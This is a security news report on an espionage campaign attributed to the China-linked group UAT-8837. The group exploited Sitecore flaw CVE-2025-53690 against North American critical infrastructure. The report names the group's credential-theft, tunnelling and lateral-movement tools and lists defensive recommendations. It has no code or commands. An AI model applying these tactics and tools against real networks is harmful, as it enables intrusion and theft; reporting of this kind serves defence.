Chinese APT Exploits Sitecore Zero-Day to Infiltrate North American Critical Infrastructure
A sophisticated cyber espionage campaign, attributed to a China-linked Advanced Persistent Threat (APT) group identified as UAT-8837, has been actively targeting critical infrastructure sectors across North America since at least 2025. This group has been observed exploiting a zero-day vulnerability in the Sitecore Experience Platform, designated as CVE-2025-53690, to gain unauthorized access to high-value organizations.
Exploitation of Sitecore Vulnerability
The vulnerability in question, CVE-2025-53690, carries a critical severity rating with a CVSS score of 9.0. It involves the deserialization of untrusted data due to the use of default machine keys in Sitecore’s Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and Managed Cloud. This flaw allows attackers to exploit exposed ASP.NET machine keys to achieve remote code execution. Sitecore released patches for this vulnerability in early September 2025, following reports of active exploitation.
Tactics and Tools Employed by UAT-8837
Upon gaining initial access through the Sitecore vulnerability, UAT-8837 employs a series of tactics and tools to maintain persistence and conduct further reconnaissance within the compromised networks. The group’s activities include:
– Disabling Security Features: The attackers disable the RestrictedAdmin mode for Remote Desktop Protocol (RDP), a security feature designed to prevent credential exposure during remote sessions.
– Deploying Open-Source Tools: UAT-8837 utilizes various open-source tools to harvest sensitive information and facilitate lateral movement within the network. Notable tools include:
– GoTokenTheft: A tool used to steal access tokens, enabling the attackers to impersonate legitimate users and escalate privileges.
– EarthWorm: A utility that creates reverse tunnels to attacker-controlled servers using SOCKS, allowing for covert communication channels.
– DWAgent: Software that enables persistent remote access and assists in Active Directory reconnaissance, providing insights into the network’s structure and user accounts.
– SharpHound: A tool designed to collect Active Directory information, aiding in the identification of potential targets for privilege escalation.
– Impacket: A collection of Python classes for working with network protocols, used to run commands with elevated privileges.
– GoExec: A Golang-based tool that executes commands on remote endpoints within the victim’s network, facilitating lateral movement.
– Rubeus: A C# toolset for Kerberos interaction and abuse, often used for credential theft and ticket manipulation.
– Certipy: A tool for Active Directory discovery and abuse, focusing on certificate services.
Reconnaissance and Data Exfiltration
After establishing a foothold, UAT-8837 conducts extensive reconnaissance to map out the network and identify valuable assets. The group has been observed exfiltrating sensitive information, including credentials, security configurations, and domain and Active Directory data. In one instance, the attackers exfiltrated DLL-based shared libraries related to the victim’s products, raising concerns about potential supply chain compromises and the possibility of trojanizing these libraries for future attacks.
Implications and Recommendations
The activities of UAT-8837 underscore the persistent threat posed by state-sponsored actors targeting critical infrastructure. The exploitation of zero-day vulnerabilities, such as CVE-2025-53690, highlights the importance of timely patching and robust security practices. Organizations are advised to:
– Apply Patches Promptly: Ensure that all systems, especially those exposed to the internet, are updated with the latest security patches.
– Monitor Network Activity: Implement continuous monitoring to detect unusual activities that may indicate a breach.
– Restrict Remote Access: Limit the use of remote access protocols and ensure they are configured securely to prevent unauthorized access.
– Conduct Regular Security Audits: Perform periodic assessments to identify and remediate potential vulnerabilities within the network.
By adopting these measures, organizations can enhance their resilience against sophisticated cyber threats and protect their critical assets from potential exploitation.
